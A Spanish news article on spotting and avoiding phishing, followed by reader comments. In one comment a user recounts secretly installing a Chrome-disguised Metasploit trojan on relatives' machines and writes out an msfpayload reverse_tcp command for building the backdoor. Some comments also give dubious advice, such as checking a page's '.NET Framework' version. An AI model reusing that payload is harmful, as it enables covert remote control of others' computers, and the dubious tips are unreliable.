¿Sabes identificar cuándo estás ante un ataque phishing? Conoce estas claves

¿Sabes identificar cuándo estás ante un ataque phishing? Conoce estas claves

Cuando navegamos por Internet son muchos los problemas que pueden provocar una pérdida de velocidad, así como mermar nuestra seguridad. Es cierto que existen también muchas soluciones, muchas medidas para proteger nuestros equipos. Sin embargo casi siempre lo mejor es tener un conocimiento amplio sobre ciertos temas y utilizar el sentido común. En este artículo vamos a hablar del phishing, que se ha convertido en una de las principales amenazas últimamente. Afecta a múltiples plataformas, así como de diferentes maneras. Vamos a explicar qué es, cómo saber diferenciar ataques phishing y, en definitiva, cómo evitar ser víctima de este tipo de amenazas.

Qué es el phishing
El phishing es un método que utilizan los ciberdelincuentes para hacerse con las credenciales y contraseñas de los usuarios. No es algo nuevo, sin embargo cada vez las técnicas son más sofisticadas. Cada vez los atacantes logran suplantar mejor la identidad de empresas o páginas legítimas para ganarse la confianza de la víctima.

Lo que buscan básicamente es lanzar un cebo, un enlace por ejemplo, para que el usuario entre. La víctima piensa que está entrando en una página legítima, como puede ser una cuenta en una red social, banco o similar. Sin embargo lo que está haciendo en realidad es entrar en un sitio controlado por el ciberdelincuente.

Cuando este usuario introduce su nombre de usuario y contraseña, realmente lo está mandando a un servidor controlado por el atacante. Está dando en bandeja esos datos tan valiosos con los que podría comprometer seriamente esas cuentas.

Como hemos mencionado, con el paso del tiempo los atacantes han perfeccionado la manera en la que envían estos ataques. Buscan, como podemos imaginar, ganar credibilidad de cara a la víctima. Hacer creer que realmente están ante una página real. Por ello conviene reconocer este tipo de sitios falsos que ponen en riesgo nuestra seguridad.

Ataque phishing a través del e-mail

Cómo identificar un ataque phishing
En ocasiones para un usuario medio no es sencillo saber identificar una página falsa y un posible ataque phishing. Esto es así ya que los atacantes son capaces de lograr una imagen casi exacta de esa página. Incluso el nombre de la dirección que aparece puede ser muy similar y llevar a confusión.

Pero hay pequeños detalles que pueden delatar si una página es ilegítima. Vamos a explicar algunos de los principales y más evidentes y que debemos de tener siempre presentes.

Lo primero es observar bien la URL. Aquí podemos encontrar pequeñas diferencias que demuestren que realmente estamos ante un sitio falso y que puede hacerse con nuestras credenciales de acceso. Por ejemplo si el nombre del dominio es distinto, aunque sea ligeramente por una letra, número o similar.

También, aunque esto no siempre es exacto, podemos fijarnos en si esa página utiliza HTTPS. De esta manera significa que nuestros datos van cifrados. En muchos ataques phishing estaríamos en una Web HTTP. Sin embargo el hecho de ser HTTPS no significa que no pueda ser falsa, pero es algo a tener en cuenta.

Además, es vital observar de manera visual una página. Esto significa ver todo en su conjunto para encontrar cosas sospechosas. Por ejemplo si entramos en una cuenta bancaria, poco sentido tiene que aparezca en el menú muchos enlaces de noticias o de otras cosas que nada tiene que ver. También la manera en la que esté configurada la propia página. Hay que mirar en busca de títulos mal escritos o traducidos, textos que no concuerden, etc.

Cómo evitar ataques phishing
En este sentido es muy importante el sentido común. Necesitamos prestar mucha atención a algunos indicativos como los que hemos mencionado. Sin embargo es vital no entrar en páginas sensibles a través de links externos. Por ejemplo no entrar en nuestra cuenta bancaria a través de un enlace que hayamos recibido a través del correo electrónico o algún mensaje de redes sociales. Siempre hay que acceder escribiendo la dirección exacta en la barra de direcciones o realizar una búsqueda en Google.

En muchas ocasiones este tipo de ataques llegan a través de correos electrónicos o mensajes en redes sociales. Sin embargo también puede ser mediante un SMS o incluso desde una web de terceros. Hay que tener mucho cuidado en este sentido y nunca ofrecer nuestras credenciales en sitios así.

Contar con programas y herramientas de seguridad también puede ayudar a prevenir este tipo de ataques. Este software defensivo puede detectar intentos de phishing y prevenir.

Evitar ataques phishing en el móvil

Cómo evitar el phishing bancario en el móvil
Uno de los tipos de ataques que más han aumentado en los últimos tiempos son los troyanos bancarios o phishing bancario en el móvil. Hoy en día utilizamos este tipo de dispositivos para llevar a cabo múltiples acciones de nuestro día a día. Una de ellas es realizar transacciones bancarias. Es por ello que los ciberdelincuentes ponen aquí sus miras.

El consejo más importante para evitar esto es descargar siempre las aplicaciones bancarias desde las tiendas oficiales. De esta manera nos aseguramos de que estamos instalando programas legítimos y que no han sido modificados de manera maliciosa.

Pero también es vital proteger, siempre que sea posible, estas aplicaciones con autenticación de dos factores. De esta manera, si nos roban las credenciales necesitarían un segundo paso para autenticarse.

En definitiva, estas son algunas claves que hay que tener en cuenta para reconocer y evitar un ataque phishing. Para los usuarios una de las cosas más valiosas son sus datos. Con este tipo de ataques estarían seriamente comprometidos.

Archivado en
Banda Ancha

A nosotros en la empresa nos daban cursos online sobre seguridad y de como identificar el phising. Cada tanto nos mandaban emails trampa para ver si estabamos atentos o abriamos cualquier porqueria.  :D

Saludos.

Pues es obvio que si ves una URL extraña no es auténtica y lo del protocolo también, ese es un clásico, además las páginas web clonadas a las que has entrado por error, puedes salvarte en el último momento (antes de cometer el error) abriendo la consola y viendo que versión de .NET Framework tiene, normalmente la tienen por debajo ya que son versiones que la empresa "tira a la basura" y que son fáciles de clonar. También observar el código fuente por supuesto (si sabes HTML5 y JavaScript, si no estás en la mierda en ese sentido)
Tema bancario, pagar siempre a través de Paypal, nunca a través de tarjeta de crédito. Si te roban la cuenta de Paypal puedes desactivar la tarjeta de crédito desde la cuenta del banco y ya no te quitarán el resto del dinero que ya te han quitado.

Aunque me daría igual pinchar en esos enlaces, que me robarán? Mi canal de YouTube con 3 suscriptores? xD Ni siquiera tengo redes sociales, y mi cuenta del banco la tengo linkeada a un email exclusivo, cada vez que lo abro es solamente para ver mis transacciones, tengo como un email para cada cosa.

Yo nunca he pinchado en esos enlaces sospechosos, cuando he tenido claro que era phising, les he respondido al e-mail diciéndoles "De verdad vais así por la vida? Anda, iros a la cama un ratito y pensad en que coño estais haciendo con vuestra vida, buscad un trabajo. Sois lamentables" al igual, así contesto cada vez que me llaman del móvil, para darme el coñazo con publicidad soy consciente de que una vez lo cojo ya saben que mi número es válido y me llamarán más. Pero es divertidísimo ver cuando algunos de ellos te responden cabreados xD Y desafortunadamente, en los correos no me han respondido, y eso que les contesto en inglés

Dyffros escribió:Pues es obvio que si ves una URL extraña no es auténtica y lo del protocolo también, ese es un clásico, además las páginas web clonadas a las que has entrado por error, puedes salvarte en el último momento (antes de cometer el error) abriendo la consola y viendo que versión de .NET Framework tiene, normalmente la tienen por debajo ya que son versiones que la empresa "tira a la basura" y que son fáciles de clonar. También observar el código fuente por supuesto (si sabes HTML5 y JavaScript, si no estás en la mierda en ese sentido)
Tema bancario, pagar siempre a través de Paypal, nunca a través de tarjeta de crédito. Si te roban la cuenta de Paypal puedes desactivar la tarjeta de crédito desde la cuenta del banco y ya no te quitarán el resto del dinero que ya te han quitado.

Aunque me daría igual pinchar en esos enlaces, que me robarán? Mi canal de YouTube con 3 suscriptores? xD Ni siquiera tengo redes sociales, y mi cuenta del banco la tengo linkeada a un email exclusivo, cada vez que lo abro es solamente para ver mis transacciones, tengo como un email para cada cosa.

Yo nunca he pinchado en esos enlaces sospechosos, cuando he tenido claro que era phising, les he respondido al e-mail diciéndoles "De verdad vais así por la vida? Anda, iros a la cama un ratito y pensad en que coño estais haciendo con vuestra vida, buscad un trabajo. Sois lamentables" al igual, así contesto cada vez que me llaman del móvil, para darme el coñazo con publicidad soy consciente de que una vez lo cojo ya saben que mi número es válido y me llamarán más. Pero es divertidísimo ver cuando algunos de ellos te responden cabreados xD Y desafortunadamente, en los correos no me han respondido, y eso que les contesto en inglés

Según la ley de protección de datos y del instituto que vela por la privacidad del ciudadano y que vela tambien porque nadie, ninguna empresa ni particular puede tener nuestros datos privados, ni siquiera nuestro teléfono, se puede denunciar  cuando esto ocurra, tanto si te llaman desde una empresa a la que no te une nada, como el recibo de cualquier mensaje  que incluya tu dirección de correo e.mail y que te dan la tabarra con los anuncios y llamadas interpectivas, con denunciarlos a defensa y privacidad de los consumidores, porque tenemos por una lado, la defensa del consumidor y por otro la ley de protección de datos privados.  

Saludos

Rocinante escribió:


Según la ley de protección de datos y del instituto que vela por la privacidad del ciudadano y que vela tambien porque nadie, ninguna empresa ni particular puede tener nuestros datos privados, ni siquiera nuestro teléfono, se puede denunciar  cuando esto ocurra, tanto si te llaman desde una empresa a la que no te une nada, como el recibo de cualquier mensaje  que incluya tu dirección de correo e.mail y que te dan la tabarra con los anuncios y llamadas interpectivas, con denunciarlos a defensa y privacidad de los consumidores, porque tenemos por una lado, la defensa del consumidor y por otro la ley de protección de datos privados.  

Saludos

Es bueno saberlo, voy a joder a los de Santa Lucía, a ver si les gusta.

Dyffros escribió:
Tema bancario, pagar siempre a través de Paypal, nunca a través de tarjeta de crédito. Si te roban la cuenta de Paypal puedes desactivar la tarjeta de crédito desde la cuenta del banco y ya no te quitarán el resto del dinero que ya te han quitado.

Me parece muy buena idea.

A su vez a Pay Pal hay que pagarle con tarjeta de crédito y no con una de debito. ¿Pero que pasa cuando no hay Paypal disponible. te arriesgarías a pagar en Internet a una compañía desconocida con tu tarjeta y ademas te preguntan tu numero de teléfono, adonde vives, y dar el numero de seguridad de la tarjeta? No digo que toda compañía con un nombre no reconocido sea necesariamente fraudulenta pero es que su seguridad podría ser tan deficiente que los mismos empleados se roban los datos.

Dyffros escribió:
Mi cuenta del banco la tengo linkeada a un email exclusivo, cada vez que lo abro es solamente para ver mis transacciones, tengo como un email para cada cosa.

Esta es otra buena idea.

Pero lo unico que no entiendo es como es que funciona ese mecanismo de protección. Tienes un correo que abres en la PC luego el virus se mete en el correo ¿y de alli acaso no se pasa despues a la PC? De ser asi no importa de cual correo entre el virus al disco duro. ¿O es que el virus no sale del correo infectado a la PC para robarse datos de contraseñas etc que se usan con los bancos?

José Antonio escribió:
Pero lo unico que no entiendo es como es que funciona ese mecanismo de protección. Tienes un correo que abres en la PC luego el virus se mete en el correo ¿y de alli acaso no se pasa despues a la PC? De ser asi no importa de cual correo entre el virus al disco duro. ¿O es que el virus no sale del correo infectado a la PC para robarse datos de contraseñas etc que se usan con los bancos?  

No, los crackers (que realmente se llaman así, los hackers son los expertos en seguridad informática que se dedican a testear la seguridad de los sistemas, nunca con fines malos. Los cracker son todo lo contrario, son los malos) tienen una consola en Kali Linux (una versión de Linux para temas de seguridad informática, posee herramientas super fuertes como Meta Exploit Framework, con la que puedes crear ejecutables con troyanos indetectables haciendo de puerta trasera una vez los abres) en la cual obtienen toda la información, ellos solo clonan la web, te la envían y una vez pulsas en su enlace falso e introduces los datos, automáticamente estos se envían a su consola y ya los tienen, es como un Keylogger pero a través de internet y que tienes que activarlo pulsando ese enlace.

He sido hacker por afición y a veces un poco cracker xd, pero solo para trollear a los de mi familia, por lo que se un poco sobre esto. Y hacía cosas como crear un ejecutable el cual poseía un troyano indetectable, le cambiaba el icono por el de Chrome y le cambiaba el original por el que había creado yo. Entonces cuando lo abrían, se les habría el cmd de Windows vacío y decían "que coño es esto?" y yo como "Nada nada xd" y ya tenía acceso a las consolas de sus dispositivos, por lo que yo a través de la consola de Meta Exploit Framework (la herramienta de Kali Linux que utilice para hacer la broma) metía comandos de Windows a su consola haciendo cosas como que de repente se les abriera el navegador con urls (ya os imaginaréis que urls… xD), les cerraba la sesión, e incluso les apagaba el ordenador. Era super divertido, desgraciadamente, me dejo de funcionar Kali Linux en la máquina virtual y se fue todo a la puta xd. Y porque he contado esto? Me hacía ilusión xd

Aquí has relatado tal cantidad de errores descriptivos y cosas imposibles de conseguir, que para que no te molestes con mi respuesta, y parezca que te ataco personalmente, lo daré por correcto y no te las voy a rebatir.

Saludos

Aquí has relatado tal cantidad de errores descriptivos y cosas imposibles de conseguir, que para que no te molestes con mi respuesta, y parezca que te ataco personalmente, lo daré por correcto y no te las voy a rebatir.

Ya lo has rebatido al decir eso xd. Cosas imposibles de conseguir? Hacer se puede, otra cosa es que no sepas programar con comandos básicos y algo de C++ luego en Windows. Yo creaba el ejecutable en Meta Exploit Framework, (esto hablando de hace 2 años, ahora al parecer se hace de forma distinta, lo acabo de mirar) concretamente el Payload, que era la puerta trasera. Si no mal recuerdo el comando para crear el troyano era

Código:

msfpayload Windows/meterpreter/reverse_tcp LHOST "ip" X > Ruta

Luego, una vez creado el troyano, metía el ejecutable a algún ordenador de los que hay un mi casa con un USB y una vez ellos lo abrían, en la consola de Kali Linux desde Meta Exploit Framework cargaba el programa y metía comandos de Windows que se enviaban al CMD de su Windows. Como TASKILL y demás. No se que verás tu de aquí mal, pero bueno, yo es lo que recuerdo que hacía.

Y bueno, lo de C++ era por si quisieras crearlo desde ese lenguaje, aunque es mucho más cómodo haciéndolo desde Kali Linux, en si el código fuente del troyano en C++ es largo, y además ni siquiera lo hice yo, yo hice las funciones, como esta:

Código:

int i,x,y;
for(i= 0; i < 201; i++) {
    x = rand()%1001;
    y = rand()%801;
    SetCursorPos(x,y);
    Sleep(200);
}
return 0;

Lo que hace es que el cursor del ratón se vuelva loco.
Quizás como he dicho, ahora se hará de otra manera, no digo que no, la seguridad informática avanza muy rápido, pero yo lo he hice así en su momento.

Dyffros escribió:

José Antonio escribió:
Pero lo unico que no entiendo es como es que funciona ese mecanismo de protección. Tienes un correo que abres en la PC luego el virus se mete en el correo ¿y de alli acaso no se pasa despues a la PC? De ser asi no importa de cual correo entre el virus al disco duro. ¿O es que el virus no sale del correo infectado a la PC para robarse datos de contraseñas etc que se usan con los bancos?  

No, los crackers (que realmente se llaman así, los hackers son los expertos en seguridad informática que se dedican a testear la seguridad de los sistemas, nunca con fines malos. Los cracker son todo lo contrario, son los malos) tienen una consola en Kali Linux (una versión de Linux para temas de seguridad informática, posee herramientas super fuertes como Meta Exploit Framework, con la que puedes crear ejecutables con troyanos indetectables haciendo de puerta trasera una vez los abres) en la cual obtienen toda la información, ellos solo clonan la web, te la envían y una vez pulsas en su enlace falso e introduces los datos, automáticamente estos se envían a su consola y ya los tienen, es como un Keylogger pero a través de internet y que tienes que activarlo pulsando ese enlace.

He sido hacker por afición y a veces un poco cracker xd, pero solo para trollear a los de mi familia, por lo que se un poco sobre esto. Y hacía cosas como crear un ejecutable el cual poseía un troyano indetectable, le cambiaba el icono por el de Chrome y le cambiaba el original por el que había creado yo. Entonces cuando lo abrían, se les habría el cmd de Windows vacío y decían "que coño es esto?" y yo como "Nada nada xd" y ya tenía acceso a las consolas de sus dispositivos, por lo que yo a través de la consola de Meta Exploit Framework (la herramienta de Kali Linux que utilice para hacer la broma) metía comandos de Windows a su consola haciendo cosas como que de repente se les abriera el navegador con urls (ya os imaginaréis que urls… xD), les cerraba la sesión, e incluso les apagaba el ordenador. Era super divertido, desgraciadamente, me dejo de funcionar Kali Linux en la máquina virtual y se fue todo a la puta xd. Y porque he contado esto? Me hacía ilusión xd

Ya con esa explicación quedo muy claro de todo, que facil.

Son bromas no le entiendo a la informática. En todo caso quedo agradecido por el consejo de usar correos separados con cada banco. Segun te entendí un virus/malware se queda en el correo infectado y no entra en la computadora.